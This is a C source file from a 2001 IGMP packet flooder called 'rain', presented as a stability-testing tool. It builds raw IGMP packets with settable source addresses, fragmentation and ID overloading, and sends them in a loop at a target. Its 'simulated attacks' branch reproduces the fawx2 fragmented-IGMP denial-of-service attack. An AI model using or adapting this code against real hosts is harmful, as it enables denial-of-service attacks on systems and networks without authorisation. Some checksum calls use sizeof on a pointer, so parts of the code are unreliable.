/*--------------------------------------------------*
 * $Header: /usr/src/Projects/rain/RCS/rain_igmp.c,v 1.1 2001/06/11 20:44:09 root Exp root $
 * $Author: root $
 * rain_igmp.c
 * rain - by Evil (mystic@tenebrous.com)
 * A flexible packet flooder for testing stability.
 * Copyright(c) 2001
 * Licensed under the GNU General Public License
 *
 * $Log: rain_igmp.c,v $
 * Revision 1.1  2001/06/11 20:44:09  root
 * Initial revision
 *
 * Revision 1.1  2001/06/11 02:59:26  root
 * Initial revision
 *
 *-------------------------------------------------*/

#include "rain_common.h"

extern void
igmp_info_init(struct pkt_info_igmp *pktigmp) {

  switch(pktigmp->type) {
    case 0x11:
    case 0x12:
    case 0x16:
    case 0x17: { break; }
    default: { strcpy(igmpinfo[pktigmp->type][pktigmp->code], " unknown"); }
  }
  switch(pktigmp->code) {
    case 0: { break; }
    default: { strcpy(igmpinfo[pktigmp->type][pktigmp->code], " unknown"); }
  }


/* type: 0x11 (membership query) */
  if(pktigmp->type == 0x11)
  strcpy(igmpinfo[17][0]," membership query");

/* type: 0x12 (version 1 membership report) */
  if(pktigmp->type == 0x12)
  strcpy(igmpinfo[18][0]," version 1 membership report");

/* type: 0x16 (version 2 membership report */
  if(pktigmp->type == 0x16)
  strcpy(igmpinfo[22][0]," version 2 membership report");

/* type: 0x17 (leave group)t */
  if(pktigmp->type == 0x17)
  strcpy(igmpinfo[23][0]," leave group");

}

extern int
igmp_shower(int raw_socket, struct sockaddr_in *source, struct sockaddr_in *target, struct pkt_info *pkt, struct pkt_info_igmp *pktigmp) {
  struct ipigmp *ip_igmp;  
  struct iphdr *ip;
  struct igmp *igmp;
  int i = 0;

  packetsize -= sizeof(struct igmp);

/* We use a global buffer to ward off memory leaks *
 * it will be freed when the program exits         */
  buffer = malloc(sizeof(char)*packetsize);
  if(!buffer) DieWithError("malloc()", ENOMEM);
  ip_igmp = (struct ipigmp*)buffer;
  ip = &ip_igmp->ip;
  igmp = &ip_igmp->igmp;

  memset(buffer, pkt->filler, (sizeof(char)*packetsize));

  /* store the user-specified string in the payload, if there is one.. */
  if(ctoi(pkt->payload[0]) != 0) {
   for(; i < strlen(pkt->payload); i++)
     buffer[(sizeof(struct iphdr) + sizeof(struct igmp)) + i] = pkt->payload[i];
  }


  pkt->tot_len = (sizeof(struct igmp) + strlen(buffer));

  igmp->igmp_type = pktigmp->type;
  igmp->igmp_code = pktigmp->code;
  igmp->igmp_group.s_addr = group.s_addr;
  igmp->igmp_cksum = in_cksum((u_short*)igmp, sizeof(struct igmp), 0);
  
  pkt->tot_len += sizeof(struct iphdr);

  ip->version  = 4;
  ip->ihl      = (sizeof(struct iphdr) >> 2);
  ip->tos      = pkt->tos;
  ip->tot_len  = htons(pkt->tot_len);
  ip->id       = (pkt->id_of == 1 ? htons(pkt->id++): htons(pkt->id));
  if(pkt->frag == 1) {
    ip->frag_off  = htons(pkt->frag_off);     /* set fragment offset */
    ip->frag_off |= htons(0x2000);            /* set fragment bit */
  } else {
    ip->frag_off = 0x0;                       /* don't fragment */
  }
  ip->ttl      = pkt->ttl;
  ip->protocol = IPPROTO_IGMP;
  ip->saddr    = source->sin_addr.s_addr;
  ip->daddr    = target->sin_addr.s_addr;
  ip->check    = in_cksum((u_short*)ip,sizeof(struct iphdr), 0);

  while(packets_sent < pkt->num) {
    /* send first packet */
    if(sendto(raw_socket,
              ip_igmp,
              pkt->tot_len,
              0,
              (struct sockaddr*)target,
              sizeof(struct sockaddr_in)) < 0) return -1;
    usleep(pkt->delay);

  /* for simulated attacks */
    if(pkt->simulate == 1) {
      if(pkt->simtype == 0) { /* fawx2.c */ 
        ip->frag_off  = htons(8 >> 3);
        ip->frag_off |= htons(0x2001);
        ip->check     = in_cksum((u_short*)ip, sizeof(ip), 0);
        igmp->igmp_type  =  2;
        igmp->igmp_code  = 31;
        igmp->igmp_cksum = in_cksum((u_short*)igmp, sizeof(igmp), 0);
    
            /* send second packet (simulating fawx2) */
            if(sendto(raw_socket,
                      ip_igmp,
                      pkt->tot_len,
                      0,
                      (struct sockaddr*)target,
                      sizeof(struct sockaddr_in)) < 0) return -1;
            packets_sent++;
      }
    }
  /* simulated attacks END */

    /* for id overloading */
    if(pkt->id_of == 1) { ip->id++; ip->id = htons(ip->id) ; ip->check = in_cksum((u_short*)ip, sizeof(ip), 0); } 

    usleep(pkt->delay);

    packets_sent++;
  }

  return 0;
}

/* EOF */
